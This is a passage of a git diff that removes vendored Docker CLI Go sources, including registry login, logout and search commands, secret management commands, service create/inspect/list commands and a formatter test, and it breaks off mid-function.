strings.TrimSpace(authconfig.Username) - - if flUser = strings.TrimSpace(flUser); flUser == "" { - if isDefaultRegistry { - // if this is a default registry (docker hub), then display the following message. - fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. 
If you don't have a Docker ID, head over to https://hub.docker.com to create one.") - } - promptWithDefault(cli.Out(), "Username", authconfig.Username) - flUser = readInput(cli.In(), cli.Out()) - flUser = strings.TrimSpace(flUser) - if flUser == "" { - flUser = authconfig.Username - } - } - if flUser == "" { - return authconfig, fmt.Errorf("Error: Non-null Username Required") - } - if flPassword == "" { - oldState, err := term.SaveState(cli.In().FD()) - if err != nil { - return authconfig, err - } - fmt.Fprintf(cli.Out(), "Password: ") - term.DisableEcho(cli.In().FD(), oldState) - - flPassword = readInput(cli.In(), cli.Out()) - fmt.Fprint(cli.Out(), "\n") - - term.RestoreTerminal(cli.In().FD(), oldState) - if flPassword == "" { - return authconfig, fmt.Errorf("Error: Password Required") - } - } - - authconfig.Username = flUser - authconfig.Password = flPassword - authconfig.ServerAddress = serverAddress - authconfig.IdentityToken = "" - - return authconfig, nil -} - -func readInput(in io.Reader, out io.Writer) string { - reader := bufio.NewReader(in) - line, _, err := reader.ReadLine() - if err != nil { - fmt.Fprintln(out, err.Error()) - os.Exit(1) - } - return string(line) -} - -func promptWithDefault(out io.Writer, prompt string, configDefault string) { - if configDefault == "" { - fmt.Fprintf(out, "%s: ", prompt) - } else { - fmt.Fprintf(out, "%s (%s): ", prompt, configDefault) - } -} - -// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image -func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) { - // Retrieve encoded auth token from the image reference - authConfig, err := resolveAuthConfigFromImage(ctx, cli, image) - if err != nil { - return "", err - } - encodedAuth, err := EncodeAuthToBase64(authConfig) - if err != nil { - return "", err - } - return encodedAuth, nil -} - -// resolveAuthConfigFromImage retrieves that AuthConfig using the image string -func 
resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) { - registryRef, err := reference.ParseNamed(image) - if err != nil { - return types.AuthConfig{}, err - } - repoInfo, err := registry.ParseRepositoryInfo(registryRef) - if err != nil { - return types.AuthConfig{}, err - } - return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go deleted file mode 100644 index 05b3bb03b2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/login.go +++ /dev/null @@ -1,85 +0,0 @@ -package registry - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type loginOptions struct { - serverAddress string - user string - password string - email string -} - -// NewLoginCommand creates a new `docker login` command -func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts loginOptions - - cmd := &cobra.Command{ - Use: "login [OPTIONS] [SERVER]", - Short: "Log in to a Docker registry", - Long: "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) > 0 { - opts.serverAddress = args[0] - } - return runLogin(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.user, "username", "u", "", "Username") - flags.StringVarP(&opts.password, "password", "p", "", "Password") - - // Deprecated in 1.11: Should be removed in docker 1.14 - flags.StringVarP(&opts.email, "email", "e", "", "Email") - flags.MarkDeprecated("email", "will be removed in 1.14.") - - return cmd -} - -func runLogin(dockerCli *command.DockerCli, opts loginOptions) error { - ctx := context.Background() - clnt := dockerCli.Client() - - 
var ( - serverAddress string - authServer = command.ElectAuthServer(ctx, dockerCli) - ) - if opts.serverAddress != "" { - serverAddress = opts.serverAddress - } else { - serverAddress = authServer - } - - isDefaultRegistry := serverAddress == authServer - - authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry) - if err != nil { - return err - } - response, err := clnt.RegistryLogin(ctx, authConfig) - if err != nil { - return err - } - if response.IdentityToken != "" { - authConfig.Password = "" - authConfig.IdentityToken = response.IdentityToken - } - if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil { - return fmt.Errorf("Error saving credentials: %v", err) - } - - if response.Status != "" { - fmt.Fprintln(dockerCli.Out(), response.Status) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go deleted file mode 100644 index 877e60e8cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/logout.go +++ /dev/null @@ -1,77 +0,0 @@ -package registry - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -// NewLogoutCommand creates a new `docker login` command -func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "logout [SERVER]", - Short: "Log out from a Docker registry", - Long: "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - var serverAddress string - if len(args) > 0 { - serverAddress = args[0] - } - return runLogout(dockerCli, serverAddress) - }, - } - - return cmd -} - -func runLogout(dockerCli *command.DockerCli, 
serverAddress string) error { - ctx := context.Background() - var isDefaultRegistry bool - - if serverAddress == "" { - serverAddress = command.ElectAuthServer(ctx, dockerCli) - isDefaultRegistry = true - } - - var ( - loggedIn bool - regsToLogout []string - hostnameAddress = serverAddress - regsToTry = []string{serverAddress} - ) - if !isDefaultRegistry { - hostnameAddress = registry.ConvertToHostname(serverAddress) - // the tries below are kept for backward compatibility where a user could have - // saved the registry in one of the following format. - regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress) - } - - // check if we're logged in based on the records in the config file - // which means it couldn't have user/pass cause they may be in the creds store - for _, s := range regsToTry { - if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok { - loggedIn = true - regsToLogout = append(regsToLogout, s) - } - } - - if !loggedIn { - fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress) - return nil - } - - fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress) - for _, r := range regsToLogout { - if err := dockerCli.CredentialsStore(r).Erase(r); err != nil { - fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go deleted file mode 100644 index 124b4ae6cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/search.go +++ /dev/null @@ -1,126 +0,0 @@ -package registry - -import ( - "fmt" - "sort" - "strings" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - 
"github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -type searchOptions struct { - term string - noTrunc bool - limit int - filter opts.FilterOpt - - // Deprecated - stars uint - automated bool -} - -// NewSearchCommand creates a new `docker search` command -func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := searchOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "search [OPTIONS] TERM", - Short: "Search the Docker Hub for images", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.term = args[0] - return runSearch(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results") - - flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds") - flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars") - - flags.MarkDeprecated("automated", "use --filter=automated=true instead") - flags.MarkDeprecated("stars", "use --filter=stars=3 instead") - - return cmd -} - -func runSearch(dockerCli *command.DockerCli, opts searchOptions) error { - indexInfo, err := registry.ParseSearchIndexInfo(opts.term) - if err != nil { - return err - } - - ctx := context.Background() - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search") - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - - options := types.ImageSearchOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - Filters: opts.filter.Value(), - Limit: opts.limit, - } - - clnt := dockerCli.Client() - - unorderedResults, 
err := clnt.ImageSearch(ctx, opts.term, options) - if err != nil { - return err - } - - results := searchResultsByStars(unorderedResults) - sort.Sort(results) - - w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0) - fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n") - for _, res := range results { - // --automated and -s, --stars are deprecated since Docker 1.12 - if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) { - continue - } - desc := strings.Replace(res.Description, "\n", " ", -1) - desc = strings.Replace(desc, "\r", " ", -1) - if !opts.noTrunc { - desc = stringutils.Ellipsis(desc, 45) - } - fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount) - if res.IsOfficial { - fmt.Fprint(w, "[OK]") - - } - fmt.Fprint(w, "\t") - if res.IsAutomated { - fmt.Fprint(w, "[OK]") - } - fmt.Fprint(w, "\n") - } - w.Flush() - return nil -} - -// SearchResultsByStars sorts search results in descending order by number of stars. -type searchResultsByStars []registrytypes.SearchResult - -func (r searchResultsByStars) Len() int { return len(r) } -func (r searchResultsByStars) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount } diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go deleted file mode 100644 index 79e669858c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/cmd.go +++ /dev/null @@ -1,25 +0,0 @@ -package secret - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSecretCommand returns a cobra command for `secret` subcommands -func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "secret", - Short: "Manage Docker secrets", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - 
newSecretListCommand(dockerCli), - newSecretCreateCommand(dockerCli), - newSecretInspectCommand(dockerCli), - newSecretRemoveCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go deleted file mode 100644 index f4683a60f5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/create.go +++ /dev/null @@ -1,79 +0,0 @@ -package secret - -import ( - "fmt" - "io" - "io/ioutil" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/system" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type createOptions struct { - name string - file string - labels opts.ListOpts -} - -func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - createOpts := createOptions{ - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] SECRET file|-", - Short: "Create a secret from a file or STDIN as content", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - createOpts.name = args[0] - createOpts.file = args[1] - return runSecretCreate(dockerCli, createOpts) - }, - } - flags := cmd.Flags() - flags.VarP(&createOpts.labels, "label", "l", "Secret labels") - - return cmd -} - -func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var in io.Reader = dockerCli.In() - if options.file != "-" { - file, err := system.OpenSequential(options.file) - if err != nil { - return err - } - in = file - defer file.Close() - } - - secretData, err := ioutil.ReadAll(in) - if err != nil { - return fmt.Errorf("Error reading content from %q: %v", options.file, err) - } - - spec := 
swarm.SecretSpec{ - Annotations: swarm.Annotations{ - Name: options.name, - Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), - }, - Data: secretData, - } - - r, err := client.SecretCreate(ctx, spec) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), r.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go deleted file mode 100644 index 0a8bd4a23f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/inspect.go +++ /dev/null @@ -1,45 +0,0 @@ -package secret - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - names []string - format string -} - -func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := inspectOptions{} - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] SECRET [SECRET...]", - Short: "Display detailed information on one or more secrets", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runSecretInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) - if err != nil { - return err - } - getRef := func(id string) (interface{}, []byte, error) { - return client.SecretInspectWithRaw(ctx, id) - } - - return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef) -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go deleted file mode 100644 index 
faeab314b7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/ls.go +++ /dev/null @@ -1,68 +0,0 @@ -package secret - -import ( - "fmt" - "text/tabwriter" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/go-units" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type listOptions struct { - quiet bool -} - -func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List secrets", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runSecretList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - - return cmd -} - -func runSecretList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - secrets, err := client.SecretList(ctx, types.SecretListOptions{}) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - if opts.quiet { - for _, s := range secrets { - fmt.Fprintf(w, "%s\n", s.ID) - } - } else { - fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED") - fmt.Fprintf(w, "\n") - - for _, s := range secrets { - created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago" - updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago" - - fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated) - } - } - - w.Flush() - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go deleted file mode 100644 index f45a619f6a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/remove.go +++ /dev/null @@ -1,57 +0,0 @@ -package secret - -import ( - "fmt" - 
"strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type removeOptions struct { - names []string -} - -func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "rm SECRET [SECRET...]", - Aliases: []string{"remove"}, - Short: "Remove one or more secrets", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts := removeOptions{ - names: args, - } - return runSecretRemove(dockerCli, opts) - }, - } -} - -func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) - if err != nil { - return err - } - - var errs []string - - for _, id := range ids { - if err := client.SecretRemove(ctx, id); err != nil { - errs = append(errs, err.Error()) - continue - } - - fmt.Fprintln(dockerCli.Out(), id) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go deleted file mode 100644 index 11d31ffd16..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/utils.go +++ /dev/null @@ -1,76 +0,0 @@ -package secret - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names -func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) { - args := filters.NewArgs() - for _, n := range terms { - args.Add("names", n) - args.Add("id", n) - } - - return 
client.SecretList(ctx, types.SecretListOptions{ - Filters: args, - }) -} - -func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) { - secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms) - if err != nil { - return nil, err - } - - if len(secrets) > 0 { - found := make(map[string]struct{}) - next: - for _, term := range terms { - // attempt to lookup secret by full ID - for _, s := range secrets { - if s.ID == term { - found[s.ID] = struct{}{} - continue next - } - } - // attempt to lookup secret by full name - for _, s := range secrets { - if s.Spec.Annotations.Name == term { - found[s.ID] = struct{}{} - continue next - } - } - // attempt to lookup secret by partial ID (prefix) - // return error if more than one matches found (ambiguous) - n := 0 - for _, s := range secrets { - if strings.HasPrefix(s.ID, term) { - found[s.ID] = struct{}{} - n++ - } - } - if n > 1 { - return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n) - } - } - - // We already collected all the IDs found. 
- // Now we will remove duplicates by converting the map to slice - ids := []string{} - for id := range found { - ids = append(ids, id) - } - - return ids, nil - } - - return terms, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go deleted file mode 100644 index 796fe926c3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/cmd.go +++ /dev/null @@ -1,29 +0,0 @@ -package service - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewServiceCommand returns a cobra command for `service` subcommands -func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "service", - Short: "Manage services", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newInspectCommand(dockerCli), - newPsCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newScaleCommand(dockerCli), - newUpdateCommand(dockerCli), - newLogsCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go deleted file mode 100644 index 1355c19c65..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/create.go +++ /dev/null @@ -1,100 +0,0 @@ -package service - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := newServiceOptions() - - cmd := &cobra.Command{ - Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Create a new service", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - if len(args) > 
1 { - opts.args = args[1:] - } - return runCreate(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)") - flags.StringVar(&opts.name, flagName, "", "Service name") - - addServiceFlags(cmd, opts) - - flags.VarP(&opts.labels, flagLabel, "l", "Service labels") - flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels") - flags.VarP(&opts.env, flagEnv, "e", "Set environment variables") - flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables") - flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service") - flags.Var(&opts.constraints, flagConstraint, "Placement constraints") - flags.Var(&opts.networks, flagNetwork, "Network attachments") - flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service") - flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port") - flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container") - flags.Var(&opts.dns, flagDNS, "Set custom DNS servers") - flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options") - flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains") - flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)") - - flags.SetInterspersed(false) - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error { - apiClient := dockerCli.Client() - createOpts := types.ServiceCreateOptions{} - - service, err := opts.ToService() - if err != nil { - return err - } - - specifiedSecrets := opts.secrets.Value() - if len(specifiedSecrets) > 0 { - // parse and validate secrets - secrets, err := ParseSecrets(apiClient, specifiedSecrets) - if err != nil { - return err - } - service.TaskTemplate.ContainerSpec.Secrets = secrets - - } - - ctx := context.Background() - - if err := resolveServiceImageDigest(dockerCli, &service); err != 
nil { - return err - } - - // only send auth if flag was set - if opts.registryAuth { - // Retrieve encoded auth token from the image reference - encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image) - if err != nil { - return err - } - createOpts.EncodedRegistryAuth = encodedAuth - } - - response, err := apiClient.ServiceCreate(ctx, service, createOpts) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go deleted file mode 100644 index deb701bf6d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/inspect.go +++ /dev/null @@ -1,84 +0,0 @@ -package service - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - refs []string - format string - pretty bool -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] SERVICE [SERVICE...]", - Short: "Display detailed information on one or more services", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - - if opts.pretty && len(opts.format) > 0 { - return fmt.Errorf("--format is incompatible with human friendly format") - } - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") - return cmd 
-} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - if opts.pretty { - opts.format = "pretty" - } - - getRef := func(ref string) (interface{}, []byte, error) { - service, _, err := client.ServiceInspectWithRaw(ctx, ref) - if err == nil || !apiclient.IsErrServiceNotFound(err) { - return service, nil, err - } - return nil, nil, fmt.Errorf("Error: no such service: %s", ref) - } - - f := opts.format - if len(f) == 0 { - f = "raw" - if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 { - f = dockerCli.ConfigFile().ServiceInspectFormat - } - } - - // check if the user is trying to apply a template to the pretty format, which - // is not supported - if strings.HasPrefix(f, "pretty") && f != "pretty" { - return fmt.Errorf("Cannot supply extra formatting options to the pretty template") - } - - serviceCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewServiceFormat(f), - } - - if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil { - return cli.StatusError{StatusCode: 1, Status: err.Error()} - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go deleted file mode 100644 index 04a65080c7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go +++ /dev/null @@ -1,129 +0,0 @@ -package service - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/pkg/testutil/assert" -) - -func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string { - b := new(bytes.Buffer) - - endpointSpec := &swarm.EndpointSpec{ - Mode: "vip", - Ports: []swarm.PortConfig{ - { - Protocol: swarm.PortConfigProtocolTCP, - TargetPort: 5000, - }, - }, - 
} - - two := uint64(2) - - s := swarm.Service{ - ID: "de179gar9d0o7ltdybungplod", - Meta: swarm.Meta{ - Version: swarm.Version{Index: 315}, - CreatedAt: now, - UpdatedAt: now, - }, - Spec: swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: "my_service", - Labels: map[string]string{"com.label": "foo"}, - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: "foo/bar@sha256:this_is_a_test", - }, - }, - Mode: swarm.ServiceMode{ - Replicated: &swarm.ReplicatedService{ - Replicas: &two, - }, - }, - UpdateConfig: nil, - Networks: []swarm.NetworkAttachmentConfig{ - { - Target: "5vpyomhb6ievnk0i0o60gcnei", - Aliases: []string{"web"}, - }, - }, - EndpointSpec: endpointSpec, - }, - Endpoint: swarm.Endpoint{ - Spec: *endpointSpec, - Ports: []swarm.PortConfig{ - { - Protocol: swarm.PortConfigProtocolTCP, - TargetPort: 5000, - PublishedPort: 30000, - }, - }, - VirtualIPs: []swarm.EndpointVirtualIP{ - { - NetworkID: "6o4107cj2jx9tihgb0jyts6pj", - Addr: "10.255.0.4/16", - }, - }, - }, - UpdateStatus: swarm.UpdateStatus{ - StartedAt: now, - CompletedAt: now, - }, - } - - ctx := formatter.Context{ - Output: b, - Format: format, - } - - err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) { - return s, nil, nil - }) - if err != nil { - t.Fatal(err) - } - return b.String() -} - -func TestPrettyPrintWithNoUpdateConfig(t *testing.T) { - s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now()) - if strings.Contains(s, "UpdateStatus") { - t.Fatal("Pretty print failed before parsing UpdateStatus") - } -} - -func TestJSONFormatWithNoUpdateConfig(t *testing.T) { - now := time.Now() - // s1: [{"ID":..}] - // s2: {"ID":..} - s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now) - t.Log("// s1") - t.Logf("%s", s1) - s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now) - t.Log("// s2") - t.Logf("%s", s2) - var m1Wrap 
[]map[string]interface{} - if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil { - t.Fatal(err) - } - if len(m1Wrap) != 1 { - t.Fatalf("strange s1=%s", s1) - } - m1 := m1Wrap[0] - t.Logf("m1=%+v", m1) - var m2 map[string]interface{} - if err := json.Unmarshal([]byte(s2), &m2); err != nil { - t.Fatal(err) - } - t.Logf("m2=%+v", m2) - assert.DeepEqual(t, m2, m1) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go deleted file mode 100644 index 724126079c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/list.go +++ /dev/null @@ -1,158 +0,0 @@ -package service - -import ( - "fmt" - "io" - "text/tabwriter" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/stringid" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -const ( - listItemFmt = "%s\t%s\t%s\t%s\t%s\n" -) - -type listOptions struct { - quiet bool - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List services", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, 